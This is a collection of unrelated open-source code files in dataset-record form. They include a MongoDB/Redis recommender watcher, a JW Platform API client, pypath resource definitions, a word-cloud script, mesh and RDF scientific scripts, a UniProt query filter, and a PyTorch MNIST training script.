try:\n            for delete_change in db['vibes'].watch(\n                [{'$match': {'operationType': 'delete'}}]\n            ):\n                # Loop through every user and try removing the vibe id\n                for f in r.scan_iter(REDIS_PREFIX + '*'):\n                    r.lrem(f, 0, str(delete_change['documentKey']['_id']))\n\n                # TODO: add snapshot in order to restart from the previous watch \n        except Exception as ex:\n            # TODO: log the exception\n            print(ex)\n\n\ndef watchInsertUsers():\n    \"\"\" Watch `users` collection and build recommendation for user \"\"\"\n    try:\n        print('Connecting to the MongoDB database... Watch Insert users')\n        mongodbUrl = os.getenv('MONGODB_URL')\n        client = MongoClient(mongodbUrl)\n        #db = client.ahunbackup\n        db = client.ahuntest\n\n        # Redis connection\n        print('Connecting to the Redis database... Watching Insert users')\n        r = redis.Redis(host=os.getenv('REDIS_HOST'), port=os.getenv('REDIS_PORT'))\n    except pymongo.errors.ServerSelectionTimeoutError as err:\n        print(err)\n        sys.exit(1)\n\n    while True:\n        try:\n            for insert_change in db['users'].watch(\n                [{'$match': {'operationType': 'insert'}}]\n            ):\n                # Calculate user's vibe recommendation\n                # User's interests\n                interests = [f for f in insert_change['fullDocument'].get('interests', [])]\n\n                # Get non-blocked following\n                following = [f['_id'] for f in db['useredges'].find({'source': insert_change['fullDocument']['_id'], 'request': 'FOLLOW'})]\n\n                # Get not-yet-seen vibes from followed users that also match the user's interests\n                #vibes_followed_interests = [f['_id'] for f in db['vibes'].find({'_id': {'$nin': seen_vibes}, 'user': {'$in': following}, 'activityType': {'$in': interests}})]\n                vibes_followed_interests = []\n\n                for f in db['vibes'].find({'user': {'$in': following}, 'activityType': {'$in': interests}}):\n                    vibes_followed_interests.append(f['_id'])\n                    #r.lrem(str(user['_id']) + ':recommended-high', 0, str(f['_id']))\n                    r.lpush(REDIS_PREFIX + str(insert_change['fullDocument']['_id']) + ':recommended-high', str(f['_id']))\n\n                # Get vibes that are based on the user's interests\n                #vibes_interests = [f['_id'] for f in db['vibes'].find({'_id': {'$nin': seen_vibes + vibes_followed_interests + vibes_followed}, 'activityType': {'$in': interests}})]\n                vibes_interests = []\n\n                for f in db['vibes'].find({'_id': {'$nin': vibes_followed_interests}, 'activityType': {'$in': interests}}):\n                    vibes_interests.append(f['_id'])\n                    # TODO: Remove any redundant data if found on redis\n                    r.lpush(REDIS_PREFIX + str(insert_change['fullDocument']['_id']) + ':recommended-medium', str(f['_id']))\n\n                # Get vibes that are not in interests\n            
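# (vibes from followed users outside the user's interests; pushed to the medium-priority queue below)\n            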
#vibes_followed = [f['_id'] for f in db['vibes'].find({'_id': {'$nin': seen_vibes + vibes_followed_interests}, 'user': {'$in': following}})]\n                vibes_followed = []\n\n                for f in db['vibes'].find({'_id': {'$nin': vibes_followed_interests + vibes_interests}, 'user': {'$in': following}}):\n                    vibes_followed.append(f['_id'])\n                    # TODO: Remove any redundant data if found on redis\n                    r.lpush(REDIS_PREFIX + str(insert_change['fullDocument']['_id']) + ':recommended-medium', str(f['_id']))\n\n                # Reserved vibes\n                #other_vibes = [f['_id'] for f in db['vibes'].find({'_id': {'$nin': seen_vibes + vibes_followed_interests + vibes_followed + vibes_interests}})]\n\n                for f in db['vibes'].find({'_id': {'$nin': vibes_followed_interests + vibes_followed + vibes_interests}}):\n                    #r.lrem(str(user['_id']) + ':recommended-reserve', 0, str(f['_id']))\n                    r.lpush(REDIS_PREFIX + str(insert_change['fullDocument']['_id']) + ':recommended-reserve', str(f['_id']))\n\n        except Exception as ex:\n            # TODO: log the exception\n            print(ex)\n\n\ndef watchUpdateUsers():\n    \"\"\" Watch `users` collection and re-build recommendation for user \"\"\"\n    pass\n\n\ndef watchVibeseen():\n    \"\"\" Watch `vibeseen` collection and remove vibe from redis \"\"\"\n    while True:\n        try:\n            for insert_change in db['vibes'].watch(\n                [{'$match': {'operationType': 'insert'}}]\n            ):\n                calculateVibeWeight(insert_change)\n        except pymongo.errors.PyMongoError as ex:\n            # TODO: log the exception\n            print(ex)\n\ndef watchInsertUseredges():\n    \"\"\" Watch `useredges` collection and build recommendation based on that \"\"\"\n    try:\n        print('Connecting to the MongoDB database... Watch Insert useredges')\n        mongodbUrl = os.getenv('MONGODB_URL')\n        client = MongoClient(mongodbUrl)\n        #db = client.ahunbackup\n        db = client.ahuntest\n\n        # Redis connection\n        print('Connecting to the Redis database... 
Watching Insert useredges')\n        r = redis.Redis(host=os.getenv('REDIS_HOST'), port=os.getenv('REDIS_PORT'))\n    except pymongo.errors.ServerSelectionTimeoutError as err:\n        print(err)\n        sys.exit(1)\n\n    while True:\n        try:\n            for insert_change in db['useredges'].watch(\n                [{'$match': {'operationType': 'insert'}}]\n            ):\n                seen_vibes = [v['_id'] for v in db['vibeseens'].find({'userId': insert_change['fullDocument']['source']})]\n                user = db['users'].find_one({'_id': insert_change['fullDocument']['source']})\n                \n                # Get the followed user vibes\n                for f in db['vibes'].find({'_id': {'$nin': seen_vibes}, 'user': insert_change['fullDocument']['destination']}):\n                    h = False\n                    # In case the followed user's vibe is already recommended, \n                    # remove the old recommendation and replicate with the new\n                    r.lrem(REDIS_PREFIX + str(user['_id']) + ':recommended-high', 0, str(f['_id']))\n                    r.lrem(REDIS_PREFIX + str(user['_id']) + ':recommended-medium', 0, str(f['_id']))\n                    r.lrem(REDIS_PREFIX + str(user['_id']) + ':recommended-reserve', 0, str(f['_id']))\n                    \n                    # If any of the activity types match the user's interests, recommend as high\n                    if 'interests' in user and f.get('activityType', []) != []:\n                        for a in f['activityType']:\n                            if a in user['interests']:\n                                r.lpush(REDIS_PREFIX + str(user['_id']) + ':recommended-high', str(f['_id']))\n                                h = True\n                                break\n                    \n                    if h == False:\n                        r.lpush(REDIS_PREFIX + str(user['_id']) + ':recommended-medium', str(f['_id']))\n                    \n\n        except Exception as ex:\n            # TODO: log the exception\n            print(ex)\n\n\nwith concurrent.futures.ProcessPoolExecutor() as executor:\n    executor.submit(watchInsertVibes)\n    executor.submit(watchDeleteVibes)\n    executor.submit(watchInsertUsers)\n    executor.submit(watchInsertUseredges)","repo_name":"ahun-et/ahun-recommender","sub_path":"watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":10291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26595608651","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\n\nimport time\nimport random\nimport hashlib\n\nimport requests\n\nfrom . import PY3, __version__\nfrom .resource import Resource\n\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\n\n\nBACKOFF_FACTOR = 1.7\nRETRY_COUNT = 5\n\n\nclass RetryAdapter(HTTPAdapter):\n    \"\"\"Exponential backoff http adapter.\n    \"\"\"\n    def __init__(self, *args, **kwargs):\n        super(RetryAdapter, self).__init__(*args, **kwargs)\n        self.max_retries = Retry(total=RETRY_COUNT,\n                                 backoff_factor=BACKOFF_FACTOR)\n\n\nif PY3:\n    from urllib.parse import quote\n    unicode = lambda s: str(s)\nelse:\n    from urllib import quote\n\n\nclass Client(object):\n    \"\"\"JW Platform API client.\n\n    An API client for the JW Platform. For the API documentation see:\n    https://developer.jwplayer.com/jw-platform/reference/v1/index.html\n\n    Args:\n        key (str): API User key\n        secret (str): API User secret\n        scheme (str, optional): Connection scheme: 'http' or 'https'.\n            Default is 'https'.\n        host (str, optional): API server host name.\n            Default is 'api.jwplatform.com'.\n        port (int, optional): API server port. 
Default is 80.\n version (str, optional): Version of the API to use.\n Default is 'v1'.\n agent (str, optional): API client agent identification string.\n\n Examples:\n >>> jwplatform_client = jwplatform.Client('API_KEY', 'API_SECRET')\n \"\"\"\n\n def __init__(self, key, secret, *args, **kwargs):\n self.__key = key\n self.__secret = secret\n\n self._scheme = kwargs.get('scheme') or 'https'\n self._host = kwargs.get('host') or 'api.jwplatform.com'\n self._port = int(kwargs['port']) if kwargs.get('port') else 80\n self._api_version = kwargs.get('version') or 'v1'\n self._agent = kwargs.get('agent')\n\n self._connection = requests.Session()\n self._connection.mount(self._scheme, RetryAdapter())\n\n self._connection.headers['User-Agent'] = 'python-jwplatform/{}{}'.format(\n __version__, '-{}'.format(self._agent) if self._agent else '')\n\n def __getattr__(self, resource_name):\n return Resource(resource_name, self)\n\n def _build_request(self, path, params=None):\n \"\"\"Build API request\"\"\"\n\n _url = '{scheme}://{host}{port}/{version}{path}'.format(\n scheme=self._scheme,\n host=self._host,\n port=':{}'.format(self._port) if self._port != 80 else '',\n version=self._api_version,\n path=path)\n\n if params is not None:\n _params = params.copy()\n else:\n _params = dict()\n\n # Add required API parameters\n _params['api_nonce'] = str(random.randint(0, 999999999)).zfill(9)\n _params['api_timestamp'] = int(time.time())\n _params['api_key'] = self.__key\n _params['api_format'] = 'json'\n _params['api_kit'] = 'py-{}{}'.format(\n __version__, '-{}'.format(self._agent) if self._agent else '')\n\n # Construct Signature Base String\n sbs = '&'.join(['{}={}'.format(\n quote((unicode(key).encode('utf-8')), safe='~'),\n quote((unicode(value).encode('utf-8')), safe='~')\n ) for key, value in sorted(_params.items())])\n\n # Add signature to the _params dict\n _params['api_signature'] = hashlib.sha1(\n '{}{}'.format(sbs, self.__secret).encode('utf-8')).hexdigest()\n\n return _url, _params\n","repo_name":"jwplayermurphy/S3-Lambda-Watchfolder","sub_path":"jwplatform/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70278622509","text":"from future.utils import iteritems\n\nimport copy\n\nimport pypath.internals.resource as resource\nimport pypath.resources.data_formats as data_formats\nimport pypath.share.session as session_mod\nimport pypath.share.settings as settings\n\n_logger = session_mod.Logger(name = 'network_resources')\n_log = _logger._log\n\n_data_models = {\n 'interaction': 'interaction',\n 'interaction_misc': 'interaction',\n 'interaction_htp': 'interaction',\n 'ligand_receptor': 'ligand_receptor',\n 'ligrecextra': 'ligand_receptor',\n 'pathway': 'activity_flow',\n 'pathway_all': 'activity_flow',\n 'pathway_noref': 'activity_flow',\n 'pathwaycommons': 'activity_flow',\n 'activity_flow': 'activity_flow',\n 'pathwayextra': 'activity_flow',\n 'dorothea': 'activity_flow',\n 'collectri': 'activity_flow',\n 'tf_target': 'activity_flow',\n 'transcription': 'activity_flow',\n 'transcription_dorothea': 'activity_flow',\n 'transcription_collectri': 'activity_flow',\n 'transcription_onebyone': 'activity_flow',\n 'pathwaycommons_transcription': 'activity_flow',\n 'tfregulons': 'activity_flow',\n 'mirna_target': 'activity_flow',\n 'lncrna_target': 'activity_flow',\n 'tf_mirna': 'activity_flow',\n 'enzyme_substrate': 'enzyme_substrate',\n 'ptm': 'enzyme_substrate',\n 
'ptm_all': 'enzyme_substrate',\n 'ptm_misc': 'enzyme_substrate',\n 'ptm_noref': 'enzyme_substrate',\n 'kinaseextra': 'enzyme_substrate',\n 'reaction': 'process_description',\n 'reaction_misc': 'process_description',\n 'reaction_pc': 'process_description',\n}\n\n\nDATASET_PRIORITIES = {\n 'omnipath': 0,\n 'directionextra': 100,\n}\n\n\n\ndef dataset_priority(dataset: str, default: int = 50) -> int:\n\n return DATASET_PRIORITIES.get(dataset, default)\n\n\ndef choose_dataset(dataset_a: str, dataset_b: str) -> str:\n\n priority_a = dataset_priority(dataset_a)\n priority_b = dataset_priority(dataset_b)\n\n return dataset_a if priority_a < priority_b else dataset_b\n\n\ndef _networkinput_to_networkresource(networkinput, data_model = None):\n\n return resource.NetworkResource(\n name = networkinput.name,\n interaction_type = networkinput.interaction_type,\n networkinput = networkinput,\n data_model = data_model,\n )\n\n\ndef dorothea_expand_levels(resources = None, levels = None):\n \"\"\"\n In a dictionary of resource definitions creates a separate\n ``NetworkResource`` object for each confidence levels of DoRothEA\n just like each level was a different resource.\n\n No matter ``resources`` is a ``NetworkResource`` or a dict of network\n resources, returns always a dict of network resources.\n \"\"\"\n\n resources = resources or transcription\n levels = levels or settings.get('tfregulons_levels')\n dorothea = {}\n\n dorothea_original = (\n resources\n if hasattr(resources, 'networkinput') else\n resources['dorothea']\n if 'dorothea' in resources else\n transcription['dorothea']\n )\n\n for level in levels:\n\n level_key = 'dorothea_%s' % level\n\n dorothea[level_key] = copy.deepcopy(dorothea_original)\n dorothea[level_key].name = 'DoRothEA_%s' % level\n dorothea[level_key].networkinput.name = 'DoRothEA_%s' % level\n dorothea[level_key].networkinput.input_args = {'levels': {level}}\n\n if resources:\n\n resources = copy.deepcopy(resources)\n _ = resources.pop('dorothea', None)\n resources.update(dorothea)\n\n return resources\n\n else:\n\n return dorothea\n\n\nfor dataset_label in dir(data_formats):\n\n dataset = getattr(data_formats, dataset_label)\n\n if not isinstance(dataset, dict):\n\n continue\n\n new_dataset = resource.NetworkDataset(name = dataset_label)\n\n for resource_label, input_def in iteritems(dataset):\n\n if not isinstance(input_def, data_formats.input_formats.NetworkInput):\n\n continue\n\n data_model = (\n input_def.data_model or\n (\n _data_models[dataset_label]\n if dataset_label in _data_models else\n 'unknown'\n )\n )\n\n if (\n data_model == 'unknown' and\n dataset_label not in {'omnipath', 'extra_directions'}\n ):\n\n _log(\n 'Could not find data model for '\n 'resource `%s` in set `%s`.' 
% (\n input_def.name,\n dataset_label,\n )\n )\n\n new_dataset[resource_label] = _networkinput_to_networkresource(\n networkinput = input_def,\n data_model = data_model,\n )\n\n if new_dataset:\n\n globals()[dataset_label] = new_dataset\n\n\n# these we need to re-create to have the data models set correctly\nextra_directions = copy.deepcopy(ptm_misc)\nextra_directions.update(copy.deepcopy(pathway_noref))\nextra_directions['acsn'] = copy.deepcopy(reaction_pc['acsn'])\nextra_directions['acsn'].data_model = 'activity_flow'\nomnipath = resource.NetworkDataset(name = 'omnipath')\nomnipath.update(pathway)\nomnipath.update(ptm)\nomnipath.update(interaction)\nomnipath['hprd'] = interaction_htp['hprd']\n","repo_name":"saezlab/pypath","sub_path":"pypath/resources/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":5154,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"29517801288","text":"# A program that:\n#\t- Reads text from the files in foxnews and nytimes subdirectories;\n#\t- Creates two separate wordclouds from the text overlayed over the democrat.png and republican.png stencils respectively;\n#\t- Creates a third wordcloud using the combined texts with the unicorn.png stencil;\n#\t- Saves the resulting images to the root directory as foximage.png, timesimage.png, and unicornimage.png;\n#\t- Saves the same images to imagearchive subdirectory with today's date prepended to filenames.\n#\n# Relies on the word cloud software package found at: https://github.com/amueller/word_cloud\n\nimport os\nfrom PIL import Image, ImageColor\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport glob\nfrom wordcloud import WordCloud, STOPWORDS, get_single_color_func\nfrom datetime import date\nfrom os import path\nimport colorsys\n\nfrom random import Random\n\ndays = 10 # number of days headlines you want to use, contingent on the date existing in the relevant directory.\ntoday = date.today().isoformat()\n\n# Read the text from the specified number of foxnews subdirectory files into \"foxtext\" string.\nfoxtext = \"\"\nlist_of_fox_files = glob.glob('foxnews/*')\nfor _ in range(days):\n if list_of_fox_files:\n latest_fox_file = max(list_of_fox_files, key=os.path.getmtime)\n foxtext += open(latest_fox_file).read()\n list_of_fox_files.remove(latest_fox_file)\n\n# Read the text from the specified number of nytimes subdirectory files into \"nytimestext\" string.\t\t\nnytimestext = \"\"\nlist_of_nytimes_files = glob.glob('nytimes/*')\nfor _ in range(days):\n if list_of_nytimes_files:\n latest_nytimes_file = max(list_of_nytimes_files, key=os.path.getmtime)\n nytimestext += open(latest_nytimes_file).read()\n list_of_nytimes_files.remove(latest_nytimes_file)\n\n\t\t\n# Combine text for unicorn image \t\t\nunicorntext = foxtext + \" \" + nytimestext\n# Code that would make unicorn use only words used by BOTH foxnews and times.\n# document_1_words = foxtext.split()\n# document_2_words = nytimestext.split()\n# unique = list(set(document_1_words).symmetric_difference(set(document_2_words)))\n# splitwords = unicorntext.split()\n# resultwords = [word for word in splitwords if word not in unique]\n# unicorntext = ' '.join(resultwords)\n\t\t\n# read the mask image\nd = path.dirname(__file__)\nfoxmask = np.array(Image.open(path.join(d, \"republican.png\")))\ntimesmask = np.array(Image.open(path.join(d, \"democrat.png\")))\nunicornmask = np.array(Image.open(path.join(d, \"unicorn.png\")))\n\n# Set list of words to exclude. 
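(STOPWORDS is the wordcloud package's bundled English stopword list.) 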
Using default with a few additions. \nstopwords = set(STOPWORDS)\nstopwords.add(\"said\")\nstopwords.add(\"say\")\nstopwords.add(\"says\")\n\n# Define color functions to feed into wordcloud recolor function\ndef red_color_func(word, font_size, position, orientation, random_state=None,\n **kwargs):\n return 'rgb({:.0f}, {:.0f}, {:.0f})'.format(255, 0, 0)\ndef blue_color_func(word, font_size, position, orientation, random_state=None,\n **kwargs):\n return 'rgb({:.0f}, {:.0f}, {:.0f})'.format(0, 0, 255)\ndef get_shaded_color_func(color):\n \"\"\"Create a color function which returns a single and value, but with varying saturation with. \n\tAccepted values are color strings as usable by PIL/Pillow.\n \"\"\"\n old_r, old_g, old_b = ImageColor.getrgb(color)\n rgb_max = 255.\n h, s, v = colorsys.rgb_to_hsv(old_r / rgb_max, old_g / rgb_max,\n old_b / rgb_max)\n\n def single_color_func(word=None, font_size=None, position=None,\n orientation=None, font_path=None, random_state=None):\n \"\"\"Random color generation.\n\n Additional coloring method. It picks a random saturation with hue and\n value based on the color given to the generating function.\n \"\"\"\n if random_state is None:\n random_state = Random()\n r, g, b = colorsys.hsv_to_rgb(h, random_state.uniform(.5, 1), v)\n return 'rgb({:.0f}, {:.0f}, {:.0f})'.format(r * rgb_max, g * rgb_max,\n b * rgb_max)\n return single_color_func \n \n# generate foxnews word cloud\nfoxwc = WordCloud(background_color=\"black\", max_words=150, mask=foxmask,\n stopwords=stopwords)\nfoxwc.generate(foxtext)\n# Apply our color function \nfoxwc.recolor(color_func=get_shaded_color_func(\"red\"))\n# store to files\nfoxwc.to_file(path.join(d, \"foximage.png\"))\nfoxwc.to_file(path.join(d, \"imagearchive/\" + today + \" foximage.png\"))\n\n# generate nytimes word cloud\ntimeswc = WordCloud(background_color=\"black\", max_words=150, mask=timesmask,\n stopwords=stopwords)\ntimeswc.generate(nytimestext)\n# Apply our color function\ntimeswc.recolor(color_func=get_shaded_color_func(\"blue\"))\n# store to files\ntimeswc.to_file(path.join(d, \"timesimage.png\"))\ntimeswc.to_file(path.join(d, \"imagearchive/\" + today + \" timesimage.png\"))\n\n# generate combined word cloud\nunicornwc = WordCloud(background_color=\"black\", max_words=150, mask=unicornmask,\n stopwords=stopwords)\nunicornwc.generate(unicorntext)\n# Apply our color function \nunicornwc.recolor(color_func=get_shaded_color_func(\"pink\"))\n# store to files\nunicornwc.to_file(path.join(d, \"unicornimage.png\"))\nunicornwc.to_file(path.join(d, \"imagearchive/\" + today + \" unicornimage.png\"))","repo_name":"PeterTsapatsaris/Red-State-Blue-State","sub_path":"makecloud.py","file_name":"makecloud.py","file_ext":"py","file_size_in_byte":5307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40707316204","text":"import numpy as np\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom fealpy.mesh import TriangleMesh\nfrom fealpy.mesh.implicit_surface import Sphere\nfrom fealpy.mesh.implicit_curve import Circle\n\nc = np.zeros(3)\npi = np.pi\nrc = 15\nalpha = pi*40/180\n\nr = rc/np.sin(alpha)\nh = r*np.cos(alpha)\n\nnode = np.zeros((7, 3), dtype=np.float)\ntheta = np.linspace(0, 2*pi, num=6, endpoint=False)\n\nnode[0, :] = [0, 0, r]\nnode[1:, 0] = 15*np.cos(theta)\nnode[1:, 1] = 15*np.sin(theta)\nnode[1:, 2] = h\n\ncell = np.array([\n (0, 1, 2), (0, 2, 3), (0, 3, 4), \n (0, 4, 5), (0, 5, 6), (0, 6, 1)\n ], dtype=np.int32)\n\nsurface = 
Sphere(c, r)\ncircle = Circle(radius=rc)\n\nmesh = TriangleMesh(node, cell)\nfor i in range(8):\n    mesh.uniform_refine() \n    isBdNode = mesh.ds.boundary_node_flag()\n    r0 = np.sqrt(np.sum(mesh.node[isBdNode, 0:2]**2, axis=1))\n    mesh.node[isBdNode, 0:2] *=rc/r0.reshape(-1, 1)\n\nmesh.node, _ = surface.project(mesh.node)\n\nmesh0 = TriangleMesh(mesh.node.copy(), mesh.ds.cell.copy())\nmesh0.node *=(r+0.03)/r\n\nmesh1 = TriangleMesh(mesh.node.copy(), mesh.ds.cell.copy())\nmesh1.node *=(r-0.03)/r\n\nfig = plt.figure()\naxes = fig.add_subplot(111, projection='3d')\n#mesh.add_plot(axes)\nmesh0.add_plot(axes)\nmesh1.add_plot(axes)\nplt.show()\n\n","repo_name":"weihuayi/fealpy","sub_path":"app/mego/shellmesh.py","file_name":"shellmesh.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"37"} +{"seq_id":"16634748377","text":"import urllib,urllib2\nimport re\n\noutput = open(\"query_reviewed.txt\", \"w+\") #Define output file. In this file, ALL the information of ALL reviewed genes of UniProt Database will be stored\n\n\n\n###############\n\n\nurl = \"https://www.uniprot.org/uniprot/?query=reviewed:yes+AND+organism:9606&format=tab\"\n\nrequest = urllib2.Request(url)\nresponse = urllib2.urlopen(request)\npage = response.read()\n\nprint(page)\noutput.write(page)\n\t\n\ninputlines = [line.rstrip('\\n') for line in open(\"query_reviewed.txt\", \"r\")] #This input file is the former output file\n\ntrusightlines = [line.rstrip('\\n') for line in open(\"trusight_expanded_text.txt\")] #Open the file containing the list of genes for which we want to retrieve information from UniProt database\n\n\n\n#Define new output file. Here, only the information of the custom genes will be stored\noutputfile = open(\"query_reviewed_filtered_txt\",\"w+\")\n\n\nfor protein in trusightlines:\n\tprot = protein\n\tfor line in inputlines:\n\t\tif re.search(r'\\b' + prot + r'\\b', line): #Using re, I can get exact matches \n\t\t\n\t\t\tprint >> outputfile, protein, line\n","repo_name":"maxxim333/API_UniProt","sub_path":"uniprotapi_method_two.py","file_name":"uniprotapi_method_two.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33790944295","text":"BRATS = \"BRATS\"\nHGG = \"HGG\"\nLGG = \"LGG\"\nBRATS_SLICE = 'BRATS-SLICE'\n\nSEQUENCE_FLR = 'flr'\nSEQUENCE_PDW = 'pdw'\nSEQUENCE_T1C = 't1c'\nSEQUENCE_T1P = 't1p'\nSEQUENCE_T2W = 't2w'\nSEQUENCES = (SEQUENCE_FLR, SEQUENCE_T1C, SEQUENCE_T1P, SEQUENCE_T2W, SEQUENCE_PDW)\n\nSEQUENCE_FLAIR = 'flair'\nSEQUENCE_T1CE = 't1ce'\nSEQUENCE_T1 = 't1'\nSEQUENCE_T2 = 't2'\nBRATS_SEQUENCES = (SEQUENCE_FLAIR, SEQUENCE_T1CE, SEQUENCE_T1, SEQUENCE_T2)\n\nEXTENSION_MNC = '.mnc'\nEXTENSION_MNC_GZ = '.mnc.gz'\nEXTENSION_NII_GZ = '.nii.gz'\nEXTENSIONS_NIB = (EXTENSION_MNC, EXTENSION_MNC_GZ, EXTENSION_NII_GZ)\n\nEXTENSION_NPY = '.npy'\nEXTENSION_NPZ = '.npz'\nEXTENSIONS = (EXTENSION_MNC, EXTENSION_MNC_GZ, EXTENSION_NII_GZ, EXTENSION_NPY, EXTENSION_NPZ)\n\nLABEL_SEG = 'seg'\nBRATS_LABELS = (LABEL_SEG,)\n\nSUFFIX_BRATS = '.nii.gz'\n\nMASK = 'mask'\nconst_MASK = \"MASK\"\nconst_SEG = \"SEG\"\nconst_MODS = \"MODS\"\nconst_PRE_GAD_MODS = \"PRE_GAD_MODS\"\nconst_POST_GAD_MODS = 
\"POST_GAD_MODS\"","repo_name":"SaverioVad/HAD_Net","sub_path":"utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"27138044461","text":"#!/usr/bin/env python\n\nimport sys\nfrom math import floor, pi\nimport numpy as np\nimport pairlist as pl\nimport gromacs\n\n\ndef main():\n atoms, cell = gromacs.load(sys.stdin)\n os = atoms['O']\n assert len(cell) == 3 # assume rect cell.\n # pairlistはnumpy arrayのみ受け入れる。\n os = np.array(os)\n cell = np.array(cell)\n # セルの形状を表現する対角行列\n cellmat = np.diag(cell)\n # 相対位置に換算する(直方体なので簡単)\n rpos = os / cell\n density = os.shape[0] / np.product(cell)\n\n # histogram\n intv = 0.003\n maxbin = 300 # int(min(min(cell[0],cell[1]),cell[2])/2 / intv)\n\n histo = [0.0 for i in range(maxbin)]\n\n # 対とその距離を計算し、ヒストグラムにする。\n # (Pure pythonの場合)\n for i, j, r in pl.pairs_iter(\n rpos, intv * maxbin, cellmat, distance=True, engine=(pl.pairs_py, None)):\n # accumulate\n ir = int(r / intv)\n if ir < maxbin:\n histo[ir] += 1\n\n for ir, h in enumerate(histo):\n r = ir * intv\n # volume of the onion shell\n dv = ((r + intv)**3 - r**3) * 4. * pi / 3.\n # average number of particles in the shell\n dn = dv * density\n print(r, h / dn / len(os) * 2)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vitroid/PairList","sub_path":"samples/RDF_pairlist.py","file_name":"RDF_pairlist.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33405018000","text":"# -*- coding: UTF-8 -*-\n\nfrom __future__ import print_function\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nimport os\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport copy\nimport parse\nimport utility as utility\n# from models import *\n\n\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv = torch.nn.Sequential(\n torch.nn.Conv2d(1, 16, 5, 1, padding=2,bias=False),\n torch.nn.BatchNorm2d(16),\n torch.nn.ReLU(inplace=True),\n torch.nn.MaxPool2d(2),\n torch.nn.Conv2d(16, 32, 5, 1, padding=2,bias=False),\n torch.nn.BatchNorm2d(32),\n torch.nn.ReLU(inplace=True),\n torch.nn.MaxPool2d(2))\n\n\n self.dense = torch.nn.Sequential(\n torch.nn.Linear(32 * 7 * 7, 100),\n torch.nn.BatchNorm1d(100),\n torch.nn.ReLU(inplace=True),\n torch.nn.Linear(100, 100),\n torch.nn.BatchNorm1d(100),\n torch.nn.ReLU(inplace=True),\n torch.nn.Linear(100, 100),\n torch.nn.BatchNorm1d(100),\n torch.nn.ReLU(inplace=True),\n torch.nn.Linear(100, 10)\n )\n\n def forward(self, x):\n conv_out = self.conv(x)\n res = conv_out.view(conv_out.size(0), -1)\n out = self.dense(res)\n return out\n\nclass Net2(torch.nn.Module):\n def __init__(self):\n super(Net2, self).__init__()\n self.conv1 = nn.Conv2d(1, 16, 5, 1, padding=2, bias=False)\n self.bn2d1 = nn.BatchNorm2d(16)\n self.conv2 = nn.Conv2d(16, 32, 5, 1, padding=2, bias=False)\n self.bn2d2 = nn.BatchNorm2d(32)\n self.dense1 = nn.Linear(32 * 7 * 7, 100)\n self.bn1d1 = nn.BatchNorm1d(100)\n self.dense2 = nn.Linear(100, 100)\n self.bn1d2 = nn.BatchNorm1d(100)\n self.dense3 = nn.Linear(100, 100)\n self.bn1d3 = nn.BatchNorm1d(100)\n self.dense4 = nn.Linear(100, 10)\n\n\n def forward(self, 
x):\n conv1 = F.max_pool2d(F.relu(self.bn2d1(self.conv1(x))), 2)\n conv2 = F.max_pool2d(F.relu(self.bn2d2(self.conv2(conv1))), 2)\n res = conv2.view(conv2.size(0), -1)\n des1 = F.relu(self.bn1d1(self.dense1(res)))\n des2 = F.relu(self.bn1d2(self.dense2(des1)))\n des3 = F.relu(self.bn1d3(self.dense3(des2)))\n out = self.dense4(des3)\n return out\n\n\n\ndef train(args, model, device, trainset, optimizer, kwargs):\n model.train()\n criterion = nn.CrossEntropyLoss()\n train_loader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, drop_last=True, num_workers=3)\n\n correct = 0\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = criterion(output, target)\n pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n loss.backward()\n optimizer.step()\n\n avg_accur = 1. * correct / len(train_loader.dataset)\n return loss.data.cpu(), avg_accur\n\n\ndef test(args, model, device, testset, kwargs):\n model.eval()\n criterion = nn.CrossEntropyLoss()\n test_loader = torch.utils.data.DataLoader(testset, batch_size=args.test_batch_size,\n shuffle=False, drop_last=False, num_workers=3)\n\n test_loss = 0\n correct = 0\n label_hat = torch.LongTensor().to(device)\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += criterion(output, target).item() # sum up batch loss\n pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability\n label_hat = torch.cat([label_hat, pred], 0)\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n\n test_loss /= len(test_loader.dataset)\n correct = float(correct)\n accur_rate = correct / len(test_loader.dataset)\n return accur_rate, label_hat.cpu().view(-1), test_loss\n\ndef weights_init(m):\n if isinstance(m, nn.Conv2d):\n # n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n # m.weight.data.normal_(0, math.sqrt(2. 
